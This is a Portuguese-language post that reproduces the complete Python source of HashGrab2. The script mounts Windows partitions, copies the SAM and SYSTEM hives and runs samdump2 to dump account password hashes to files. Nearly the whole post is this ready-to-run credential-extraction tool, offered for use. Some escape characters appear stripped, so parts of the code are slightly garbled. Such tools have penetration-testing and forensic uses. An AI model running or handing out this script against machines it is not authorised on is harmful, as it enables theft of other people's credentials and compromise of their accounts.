Hashgrab2 - extraindo usuário e senha do Windows

Hashgrab2 automaticamente encontra e monta uma partição Windows e utiliza a ferramenta samdump2 para extrair usuário e senha que esta em hash nos arquivos SAM e SYSTEM.

#!/usr/bin/env python

#Name:    HashGrab2.py

#Version: 2.0

#Author:  s3my0n

#Website: InterN0T.net

#########################################################################

# HashGrab2 automatically mounts any Windows drives it can find, and    #

# using samdump2 extracts username-password hashes from SAM and SYSTEM  #

# files located on the Windows drive, after which it writes them to     #

# user specified directory.                                             #

#                                                                       #

# Copyright (C) 2010 s3my0n                                             #

#                                                                       #

# This program is free software: you can redistribute it and/or modify  #

# it under the terms of the GNU General Public License as published by  #

# the Free Software Foundation, either version 3 of the License, or     #

# any later version.                                                    #

#                                                                       #

# This program is distributed in the hope that it will be useful,       #

# but WITHOUT ANY WARRANTY; without even the implied warranty of        #

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         #

# GNU General Public License for more details.                          #

#                                                                       #

# You should have received a copy of the GNU General Public License     #

# along with this program.  If not, see <http://www.gnu.org/licenses/>. #

#########################################################################

import sys, os, random, shutil, re, subprocess

from time import sleep

class HashGrab(object):

    def __init__(self, basedir, filesystems=['HPFS/NTFS', 'FAT16/FAT32']):

        self.basedir = basedir

        self.filesystems = filesystems

        self.dirstocheck = ['/WINDOWS/System32/config/', '/Windows/System32/config/',

                            '/WINNT/System32/config/', '/WINDOWS/system32/config/']

        self.files = ['SYSTEM', 'SAM', 'system', 'sam']

        self.hashes = {}

        self.devs = []

        self.mountdirs = []

        self.samsystem_dirs = {}

        self.filestocopy = []

    def findPartitions(self):

        decider = subprocess.Popen(('whoami'), stdout=subprocess.PIPE).stdout

        decider = decider.read().strip()

        if decider != 'root':

            print 'n [-] Error: you are not root'

            sys.exit(1)

        else:

            ofdisk = subprocess.Popen(('fdisk', '-l'), stdout=subprocess.PIPE).stdout

            rfdisk = [i.strip() for i in ofdisk]

            ofdisk.close()

            for line in rfdisk:

                for f in self.filesystems:

                    if f in line:

                        dev = re.findall('/w+/w+d+', line)

                        self.devs.append(dev[0])

    def mountPartitions(self):

        def randgen(integer):

            chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

            x = random.sample(chars, integer)

            randstring = ''.join(x)

            return randstring

        for dev in self.devs:

            mname = randgen(6)

            mdir = '/mnt/%s' % (mname)

            self.mountdirs.append([mdir, mname])

            os.mkdir(mdir)

            cmd = subprocess.call(('mount', '%s'%(dev), '%s'%(mdir)))

            if cmd == 1:

                print 'n [-] Could not mount %s to %s: exiting' % (dev, mdir)

                sys.exit(1)

            else:

                print 'n [*] Mounted %s to %s' % (dev, mdir)

    def findSamSystem(self):

        part_number = 0

        for m in self.mountdirs:

            self.filestocopy.append(m)

            for d in self.dirstocheck:

                for f in self.files:

                    cdir = '%s%s%s' % (m[0], d, f)

                    if os.path.isfile(cdir):

                        self.filestocopy[part_number].append(cdir)

            part_number+=1

    def copySamSystem(self):

        nmountdirs = len(self.mountdirs)

        decider = 0

        ftocopy = []

        for f in self.filestocopy:

            if len(f) < 4:

                decider += 1

            else:

                ftocopy.append(f)

        if decider == nmountdirs:

            print 'n [-] Could not find SAM and SYSTEM files in %s' % (self.devs)

            self.cleanUp()

            sys.exit()

        else:

            print 'n [*] Copying SAM and SYSTEM files...n'

            for f in ftocopy:

                cpdir = '%s%s' % (self.basedir, f[1])

                self.samsystem_dirs[f[1]] = cpdir

                os.mkdir(cpdir)

                shutil.copy(f[2], '%s/SYSTEM'%(cpdir))

                shutil.copy(f[3], '%s/SAM'%(cpdir))

    def extractHashes(self):

        for d in self.samsystem_dirs:

            try:

                cmd = subprocess.Popen(('samdump2', '%s/SAM'%(self.samsystem_dirs[d]), '%s/SYSTEM'%(self.samsystem_dirs[d])), stdout=subprocess.PIPE).stdout

                self.hashes[d] = cmd.readlines()

            except OSError:

                print 'n [-] SamDump2 was not found: exiting'

                self.cleanUp()

                sys.exit(1)

    def writeHashes(self):

        for i in self.hashes:

            try:

                ofile = open('%s%s.txt'%(self.basedir, i), 'w+')

                hashes = self.hashes[i]

                for line in hashes:

                    ofile.write(line)

                ofile.close()

            except IOError:

                print 'n [-] Error: could not open %s to write hashes to' % ('%s%s.txt'%(self.basedir, i))

                self.cleanUp(cpdirs=True)

                sys.exit(1)

    def cleanUp(self, devs=True, mdirs=True, cpdirs=False):

        if devs:

            print 'n [*] Unmounting partitions...'

            sleep(1) # sometimes fails if you don't sleep

            for dev in self.devs:

                subprocess.call(('umount', '%s'%(dev)))

        if mdirs:

            print 'n [*] Deleting mount directories...'

            for d in self.mountdirs:

                os.rmdir(d[0])

        if cpdirs:

            print 'n [*] Deleting %s' % (self.samsystem_dirs.values())

            for d in self.samsystem_dirs.values():

                shutil.rmtree(d)

def about():

    return r'''

  _               _                     _    ___

 | |             | |                   | |  |__

 | |__   __ _ ___| |__   __ _ _ __ __ _| |__   ) |

 | '_  / _` / __| '_  / _` | '__/ _` | '_  / /

 | | | | (_| __  | | | (_| | | | (_| | |_) / /_

 |_| |_|__,_|___/_| |_|__, |_|  __,_|_.__/____|

                         __/ |

                        |___/

 HashGrab v2.0 by s3my0n

http://InterN0T.net

 Contact: RuSH4ck3R[at]gmail[dot]com

 '''

if __name__=='__main__':

    print about()

    basedir = './' #change hashes copy directory (include "/" at the end of path)

    decider = os.path.exists(basedir)

    if (decider == True) and (basedir[-1:] == '/'):

        hg = HashGrab(basedir)

        hg.findPartitions()

        hg.mountPartitions()

        hg.findSamSystem()

        hg.copySamSystem()

        hg.extractHashes()

        hg.writeHashes()

        hg.cleanUp(cpdirs=True)

    else:

        print 'n [-] Error: check your basedir'

        sys.exit(1)

Fonte: http://www.pentestit.com/tag/hashgrab2/